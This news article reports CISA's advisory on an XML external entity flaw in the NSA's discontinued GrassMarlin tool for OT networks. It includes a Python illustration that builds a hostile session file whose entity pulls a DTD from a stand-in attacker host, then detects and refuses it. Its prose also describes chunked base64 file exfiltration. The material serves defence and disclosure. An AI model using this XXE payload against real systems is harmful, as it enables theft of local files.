CISA flags data-theft bug in NSA-built OT networking tool
The Cybersecurity and Infrastructure Security Agency (CISA) is warning anyone who uses GrassMarlin, a tool developed by the National Security Agency (NSA), about a new vulnerability that attackers can use to snoop on sensitive information.
First reported by Grady DeRosa, senior industrial pentester at Dragos, the weak spot affects all versions of GrassMarlin, a tool developed and open-sourced by the NSA to support network security at critical infrastructure organizations, industrial control systems, and SCADA networks.
GrassMarlin reached end of life in 2017, so no fix is in the works. CISA's guidance is the usual set of mitigations: make sure control system devices are not reachable from the open internet, put control system networks and remote devices behind firewalls and isolate them from the business network, and use secure methods for any remote access.
In typical fashion, CISA did not offer many details regarding CVE-2026-6807, which carries a CVSS score of 5.5, but it did confirm that a successful exploit could disclose sensitive information.
However, in an advisory published on Tuesday, it said: “The flaw stems from insufficient hardening of the XML parsing process.”
Weaknesses of this type (CWE-611, Improper Restriction of XML External Entity Reference) affect products that parse XML. GrassMarlin primarily uses XML for session files: it writes several files holding different kinds of data, including lists of nodes and edges, node positioning, colors, and session metadata, then bundles them into a ZIP archive saved with a .gm3 extension.
Attacks on this weakness, usually called XML External Entity (XXE) attacks, typically involve tricking a user of the system into opening a maliciously crafted XML file whose document type definition (DTD) declares external entities. If the parser resolves those entities, it can be made to read local files or to contact an attacker-controlled server, which is how the data leaves the machine.
This is a general overview of how XXE attacks play out. CISA did not define how CVE-2026-6807 could be exploited specifically.
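As an added illustration, not code from the advisory, from GrassMarlin, or from Quinn's proof of concept, the Python below builds a constructed .gm3-style archive containing a hypothetical session XML that carries the textbook out-of-band XXE pattern (a parameter entity that pulls an external DTD from an attacker host), flags any XML member that declares a DOCTYPE or ENTITY before the archive is opened, and shows a parser configured to refuse DTDs outright. The member names (nodes.xml, edges.xml), the element names (nodes, node) and the attacker host are assumptions; GrassMarlin's real session layout is not described on this page.

```python
import io
import zipfile
import xml.parsers.expat as expat

# Constructed sample data. The member and element names are assumptions;
# GrassMarlin's real session layout is not described on the page.
BENIGN_NODES_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<nodes>
  <node id="1" ip="10.0.0.5" name="PLC-01"/>
  <node id="2" ip="10.0.0.9" name="HMI-01"/>
</nodes>
"""

# Textbook out-of-band XXE pattern: a parameter entity fetches an attacker-hosted
# DTD, which can then read a local file and push it out in a URL. The host is
# illustrative and not taken from the advisory or the PoC.
HOSTILE_NODES_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nodes [
  <!ENTITY % remote SYSTEM "http://attacker.example/evil.dtd">
  %remote;
]>
<nodes>
  <node id="1" ip="10.0.0.5" name="PLC-01"/>
</nodes>
"""

# XML keywords are case-sensitive, so a literal match is exact and does not
# trip on element content that happens to contain the word "entity".
DTD_MARKERS = (b"<!DOCTYPE", b"<!ENTITY")


def build_gm3(members):
    """Bundle {name: bytes} into a ZIP blob, mirroring the .gm3 layout the
    article describes (several XML files inside one archive)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def scan_gm3(blob):
    """Triage an archive before opening it: report every XML member that
    carries a DOCTYPE or ENTITY declaration. A session file has no reason to
    declare either, so any hit is suspicious."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".xml"):
                continue
            data = zf.read(info)
            hits = [m.decode() for m in DTD_MARKERS if m in data]
            if hits:
                findings[info.filename] = hits
    return findings


class DtdRefused(Exception):
    """Raised when a document tries to declare a DTD or reference an external entity."""


def parse_rejecting_dtd(data):
    """Hardened parse: expat with external parameter entity parsing disabled,
    a DOCTYPE handler that aborts, and an external entity handler that fails
    loudly instead of silently skipping. Returns the element names seen."""
    seen = []
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def refuse_doctype(name, system_id, public_id, has_internal_subset):
        raise DtdRefused(f"DOCTYPE {name!r} not allowed (system id {system_id!r})")

    def refuse_external(context, base, system_id, public_id):
        raise DtdRefused(f"external entity {system_id!r} not fetched")

    parser.StartDoctypeDeclHandler = refuse_doctype
    parser.ExternalEntityRefHandler = refuse_external
    parser.StartElementHandler = lambda name, attrs: seen.append(name)
    parser.Parse(data, True)
    return seen


def open_session_safely(blob):
    """Return (ok, detail): ok is False if triage or hardened parsing objects."""
    findings = scan_gm3(blob)
    if findings:
        return False, findings
    parsed = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".xml"):
                try:
                    parsed[info.filename] = parse_rejecting_dtd(zf.read(info))
                except DtdRefused as exc:
                    return False, {info.filename: [str(exc)]}
    return True, parsed


if __name__ == "__main__":
    good = build_gm3({"nodes.xml": BENIGN_NODES_XML})
    bad = build_gm3({"nodes.xml": HOSTILE_NODES_XML, "edges.xml": BENIGN_NODES_XML})
    print("benign:", open_session_safely(good))
    print("hostile:", open_session_safely(bad))
```

Run as a script, it prints the benign archive's element list and the hostile archive's findings. GrassMarlin itself is written in Java, where the equivalent hardening is disabling DOCTYPE declarations and external entity resolution on the parser factory; since the project is unmaintained and will not get that change, a triage pass like scan_gm3 over any session file received from someone else is the practical control.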
Anna Quinn, penetration tester at Rapid7, however, worked up a public proof-of-concept exploit and posted it to GitHub.
“Looking at the code for Grassmarlin, I determined that the likely vulnerable parameters had to do with the XML files ingested when opening stored sessions,” Quinn wrote. “By crafting malicious requests I discovered I could induce an error in the message console within Grassmarlin. The cause and content of the error was properly stripped from all logs and output within Grassmarlin.
“However, OOB exfiltration of arbitrary files was possible by referencing an external host in the DTD. Some caveats did appear to apply: newer versions of Java could not be used on the system, meaning that Grassmarlin had to use the version of Java bundled in the installer. Additionally, many types of input would cause errors which would impede the exfil process. To bypass this, the content would be converted to base64 and then sent across multiple message chunks.”
In a separate post on LinkedIn, Quinn noted that the bug won’t pose much of a threat to most organizations, and that it can only realistically be exploited via phishing – whether from a local user or an external email. ®
